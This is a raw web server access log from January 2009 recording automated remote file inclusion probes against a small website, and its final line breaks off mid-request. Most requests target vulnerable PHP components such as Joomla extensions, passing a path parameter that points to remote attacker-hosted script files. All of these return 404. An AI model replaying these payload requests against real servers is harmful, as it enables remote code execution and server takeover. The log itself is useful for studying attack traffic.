200.234.200.132 - - [06/Jan/2009:05:33:25 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.web20milliondollarhomepage.com"
200.234.200.132 - - [06/Jan/2009:05:33:25 -0800] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.web20milliondollarhomepage.com"
202.160.181.186 - - [06/Jan/2009:05:33:29 -0800] "GET /?D=A HTTP/1.0" 200 763 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)" "web20milliondollarhomepage.com"
200.234.200.132 - - [06/Jan/2009:05:33:46 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.web20milliondollarhomepage.com"
62.141.37.54 - - [06/Jan/2009:05:33:50 -0800] "GET /include/admin.lib.inc.php?site_path=http://brant.3x.ro/test.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.web20milliondollarhomepage.com"
200.49.188.178 - - [06/Jan/2009:05:34:06 -0800] "GET /logs/access_081207.log//components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://ext-group.ru/download/vnc/idfeel.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.web20milliondollarhomepage.com"
85.214.53.78 - - [06/Jan/2009:05:34:35 -0800] "GET /logs/access_081207.log/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
85.214.53.78 - - [06/Jan/2009:05:34:36 -0800] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
85.214.53.78 - - [06/Jan/2009:05:34:36 -0800] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.inc-dz.net/images/fbfiles/avatars/gallery/robots.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.web20milliondollarhomepage.com"
218.232.109.160 - - [06/Jan/2009:05:34:39 -0800] "GET /technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.web20milliondollarhomepage.com"
218.232.109.160 - - [06/Jan/2009:05:34:40 -0800] "GET /logs/access.log//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.web20milliondollarhomepage.com"
218.232.109.160 - - [06/Jan/2009:05:34:40 -0800] "GET /logs//technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://flowskatepark.org/WebCalendar-1.0.4//includes/compress.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.web20milliondollarhomepage.com"
200.234.200.132 - - [06/Jan/2009:05:34:50 -0800] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.web20milliondollarhomepage.com"
200.234.200.132 - - [06/Jan/2009:05:34:50 -0800] "GET /logs/access_081207.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://josipanicic.freelinuxhost.com/jembut/index/idfe.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.web20milliondollarhomepage.com"
200.234.200.132 - - [06/Jan/2009:05:34:50 -0800] "GET /administrator/components/com_multibanners/extadm